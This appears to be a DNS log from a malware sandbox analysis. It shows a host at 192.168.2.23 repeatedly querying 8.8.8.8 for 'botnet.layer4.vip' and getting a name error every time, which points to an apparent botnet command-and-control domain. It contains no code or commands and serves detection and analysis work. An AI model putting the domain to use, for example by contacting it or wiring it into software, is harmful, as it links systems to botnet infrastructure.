                                  Apr 9, 2023 03:32:22.337063074 CEST8.8.8.8192.168.2.230x9ceeName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.424643993 CEST8.8.8.8192.168.2.230x9ceeName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.504731894 CEST8.8.8.8192.168.2.230x51e7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.529539108 CEST8.8.8.8192.168.2.230x51e7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.593421936 CEST8.8.8.8192.168.2.230x6777Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.617371082 CEST8.8.8.8192.168.2.230x6777Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.641644001 CEST8.8.8.8192.168.2.230x6777Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.690215111 CEST8.8.8.8192.168.2.230x4c2bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.706016064 CEST8.8.8.8192.168.2.230x4c2bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.722825050 CEST8.8.8.8192.168.2.230x4c2bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.738909006 CEST8.8.8.8192.168.2.230x4c2bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.763894081 CEST8.8.8.8192.168.2.230x5feaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.788435936 CEST8.8.8.8192.168.2.230x5feaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.856017113 CEST8.8.8.8192.168.2.230x5feaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.872577906 CEST8.8.8.8192.168.2.230x9dabName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.912528992 CEST8.8.8.8192.168.2.230x9dabName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.953416109 CEST8.8.8.8192.168.2.230x9dabName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:22.993120909 CEST8.8.8.8192.168.2.230x895Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.008928061 CEST8.8.8.8192.168.2.230x895Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.040608883 CEST8.8.8.8192.168.2.230x895Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.087486029 CEST8.8.8.8192.168.2.230x4b14Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.151707888 CEST8.8.8.8192.168.2.230xd7c7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.183212996 CEST8.8.8.8192.168.2.230xd7c7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.207232952 CEST8.8.8.8192.168.2.230xd7c7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.222841024 CEST8.8.8.8192.168.2.230xd7c7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.247242928 CEST8.8.8.8192.168.2.230x3799Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.302911043 CEST8.8.8.8192.168.2.230x3799Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.327049017 CEST8.8.8.8192.168.2.230x3799Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.351315975 CEST8.8.8.8192.168.2.230x8deName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.366955996 CEST8.8.8.8192.168.2.230x8deName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.438457012 CEST8.8.8.8192.168.2.230xc8eeName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.454052925 CEST8.8.8.8192.168.2.230xc8eeName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.502877951 CEST8.8.8.8192.168.2.230xc8eeName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.543098927 CEST8.8.8.8192.168.2.230x9863Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.567528009 CEST8.8.8.8192.168.2.230x9863Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.582978964 CEST8.8.8.8192.168.2.230x9863Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.598885059 CEST8.8.8.8192.168.2.230x9863Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.623923063 CEST8.8.8.8192.168.2.230x9863Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.703080893 CEST8.8.8.8192.168.2.230xe702Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.776125908 CEST8.8.8.8192.168.2.230xef58Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.824309111 CEST8.8.8.8192.168.2.230xef58Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.864628077 CEST8.8.8.8192.168.2.230x1a29Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.880126953 CEST8.8.8.8192.168.2.230x1a29Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.928539991 CEST8.8.8.8192.168.2.230x1a29Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:23.952780962 CEST8.8.8.8192.168.2.230x835aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.000961065 CEST8.8.8.8192.168.2.230x835aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.041402102 CEST8.8.8.8192.168.2.230x835aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.065956116 CEST8.8.8.8192.168.2.230xbf21Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.081415892 CEST8.8.8.8192.168.2.230xbf21Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.173151970 CEST8.8.8.8192.168.2.230x3a65Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.199076891 CEST8.8.8.8192.168.2.230x3a65Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.278604984 CEST8.8.8.8192.168.2.230x2373Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.312782049 CEST8.8.8.8192.168.2.230x2373Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.328350067 CEST8.8.8.8192.168.2.230x2373Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.368660927 CEST8.8.8.8192.168.2.230x32f8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.384722948 CEST8.8.8.8192.168.2.230x32f8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.400749922 CEST8.8.8.8192.168.2.230x32f8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.449067116 CEST8.8.8.8192.168.2.230x32f8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.529773951 CEST8.8.8.8192.168.2.230x108fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.554474115 CEST8.8.8.8192.168.2.230x108fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.586905003 CEST8.8.8.8192.168.2.230xc625Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.610971928 CEST8.8.8.8192.168.2.230xc625Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.684187889 CEST8.8.8.8192.168.2.230x1a89Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.731575966 CEST8.8.8.8192.168.2.230x1a89Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.747138023 CEST8.8.8.8192.168.2.230x1a89Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.763211966 CEST8.8.8.8192.168.2.230xdab2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.811646938 CEST8.8.8.8192.168.2.230xdab2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.851284027 CEST8.8.8.8192.168.2.230xdab2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.867188931 CEST8.8.8.8192.168.2.230xe319Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.882870913 CEST8.8.8.8192.168.2.230xe319Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.898413897 CEST8.8.8.8192.168.2.230xe319Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.922816038 CEST8.8.8.8192.168.2.230xe319Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.947129011 CEST8.8.8.8192.168.2.230xe319Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:24.988239050 CEST8.8.8.8192.168.2.230x4236Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.003698111 CEST8.8.8.8192.168.2.230x4236Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.028151035 CEST8.8.8.8192.168.2.230x4236Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.070523024 CEST8.8.8.8192.168.2.230xa0a7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.120248079 CEST8.8.8.8192.168.2.230xa0a7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.160442114 CEST8.8.8.8192.168.2.230xa0a7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.211127996 CEST8.8.8.8192.168.2.230xd14cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.245557070 CEST8.8.8.8192.168.2.230xd14cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.310050011 CEST8.8.8.8192.168.2.230x515eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.438652039 CEST8.8.8.8192.168.2.230xd59eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.454232931 CEST8.8.8.8192.168.2.230xd59eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.478266001 CEST8.8.8.8192.168.2.230xd59eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.526025057 CEST8.8.8.8192.168.2.230xc913Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.557766914 CEST8.8.8.8192.168.2.230xc913Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.612634897 CEST8.8.8.8192.168.2.230x83daName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.652750015 CEST8.8.8.8192.168.2.230x83daName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.684396029 CEST8.8.8.8192.168.2.230x6246Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.731364965 CEST8.8.8.8192.168.2.230x6246Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.795984030 CEST8.8.8.8192.168.2.230x20b9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.811842918 CEST8.8.8.8192.168.2.230x20b9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.827271938 CEST8.8.8.8192.168.2.230x20b9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.851401091 CEST8.8.8.8192.168.2.230x9f63Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.875941038 CEST8.8.8.8192.168.2.230x9f63Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.891705036 CEST8.8.8.8192.168.2.230x9f63Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.907577991 CEST8.8.8.8192.168.2.230x9f63Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:25.923532963 CEST8.8.8.8192.168.2.230x9f63Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.028343916 CEST8.8.8.8192.168.2.230xce63Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.043926954 CEST8.8.8.8192.168.2.230x524bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.108336926 CEST8.8.8.8192.168.2.230x524bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.132700920 CEST8.8.8.8192.168.2.230x524bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.173033953 CEST8.8.8.8192.168.2.230x245eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.204592943 CEST8.8.8.8192.168.2.230x245eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.244700909 CEST8.8.8.8192.168.2.230xbcd5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.276362896 CEST8.8.8.8192.168.2.230xbcd5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.300575972 CEST8.8.8.8192.168.2.230xbcd5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.324860096 CEST8.8.8.8192.168.2.230xbcd5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.356422901 CEST8.8.8.8192.168.2.230x3b19Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.405113935 CEST8.8.8.8192.168.2.230x3b19Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.429614067 CEST8.8.8.8192.168.2.230x3b19Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.469671965 CEST8.8.8.8192.168.2.230xdfa9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.494133949 CEST8.8.8.8192.168.2.230xdfa9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.518589973 CEST8.8.8.8192.168.2.230xdfa9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.534214973 CEST8.8.8.8192.168.2.230xdfa9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.551719904 CEST8.8.8.8192.168.2.230x5b21Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.583333969 CEST8.8.8.8192.168.2.230x5b21Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.607247114 CEST8.8.8.8192.168.2.230x5b21Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.631562948 CEST8.8.8.8192.168.2.230x5b21Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.663450956 CEST8.8.8.8192.168.2.230xfe97Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.718965054 CEST8.8.8.8192.168.2.230xfe97Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.750643969 CEST8.8.8.8192.168.2.230x9e4bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.775007963 CEST8.8.8.8192.168.2.230x9e4bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.854985952 CEST8.8.8.8192.168.2.230xf2e3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.879426003 CEST8.8.8.8192.168.2.230xf2e3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.967945099 CEST8.8.8.8192.168.2.230xf190Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:26.991940975 CEST8.8.8.8192.168.2.230xf190Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:27.016273975 CEST8.8.8.8192.168.2.230xf190Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:27.064661026 CEST8.8.8.8192.168.2.230xe509Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:27.112853050 CEST8.8.8.8192.168.2.230xe509Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:27.144452095 CEST8.8.8.8192.168.2.230xe509Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:27.200179100 CEST8.8.8.8192.168.2.230xe6eeName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:27.240115881 CEST8.8.8.8192.168.2.230xe6eeName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:27.256724119 CEST8.8.8.8192.168.2.230x658Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:27.280842066 CEST8.8.8.8192.168.2.230x658Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.331141949 CEST8.8.8.8192.168.2.230x658Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.355705023 CEST8.8.8.8192.168.2.230x658Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.411618948 CEST8.8.8.8192.168.2.230x5b6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.427448988 CEST8.8.8.8192.168.2.230x5b6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.458800077 CEST8.8.8.8192.168.2.230x851eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.498361111 CEST8.8.8.8192.168.2.230x851eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.522417068 CEST8.8.8.8192.168.2.230x851eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.546838999 CEST8.8.8.8192.168.2.230x851eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.562752008 CEST8.8.8.8192.168.2.230x853fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.611143112 CEST8.8.8.8192.168.2.230x853fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.669250011 CEST8.8.8.8192.168.2.230x614cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.693645954 CEST8.8.8.8192.168.2.230x614cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.718070030 CEST8.8.8.8192.168.2.230x614cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.733721018 CEST8.8.8.8192.168.2.230x614cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.789467096 CEST8.8.8.8192.168.2.230x8454Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.820663929 CEST8.8.8.8192.168.2.230x8454Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.876596928 CEST8.8.8.8192.168.2.230xdb6aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.892075062 CEST8.8.8.8192.168.2.230xdb6aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.907901049 CEST8.8.8.8192.168.2.230xdb6aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.947473049 CEST8.8.8.8192.168.2.230x7d05Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:29.987051964 CEST8.8.8.8192.168.2.230x7d05Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.011388063 CEST8.8.8.8192.168.2.230x7d05Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.051117897 CEST8.8.8.8192.168.2.230x453cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.075222969 CEST8.8.8.8192.168.2.230x453cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.131148100 CEST8.8.8.8192.168.2.230x453cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.193576097 CEST8.8.8.8192.168.2.230xb58dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.224700928 CEST8.8.8.8192.168.2.230xbe31Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.271953106 CEST8.8.8.8192.168.2.230xbe31Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.312720060 CEST8.8.8.8192.168.2.230xcfffName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.337213039 CEST8.8.8.8192.168.2.230xcfffName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.371262074 CEST8.8.8.8192.168.2.230xcfffName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.387092113 CEST8.8.8.8192.168.2.230xcfffName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.411376953 CEST8.8.8.8192.168.2.230xd567Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.435405016 CEST8.8.8.8192.168.2.230xd567Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.485105038 CEST8.8.8.8192.168.2.230xd567Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.511075974 CEST8.8.8.8192.168.2.230xd567Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.535660982 CEST8.8.8.8192.168.2.230xea40Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.551616907 CEST8.8.8.8192.168.2.230xea40Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.567095041 CEST8.8.8.8192.168.2.230xea40Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.639727116 CEST8.8.8.8192.168.2.230xbb92Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.663809061 CEST8.8.8.8192.168.2.230xbb92Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.687808990 CEST8.8.8.8192.168.2.230xbb92Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.703272104 CEST8.8.8.8192.168.2.230xbb92Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.733541012 CEST8.8.8.8192.168.2.230xbb92Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.749501944 CEST8.8.8.8192.168.2.230x9cf4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.934132099 CEST8.8.8.8192.168.2.230xeb32Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.949860096 CEST8.8.8.8192.168.2.230xb9a8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.981139898 CEST8.8.8.8192.168.2.230xb9a8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:30.996794939 CEST8.8.8.8192.168.2.230xb9a8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:31.021033049 CEST8.8.8.8192.168.2.230xb9a8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
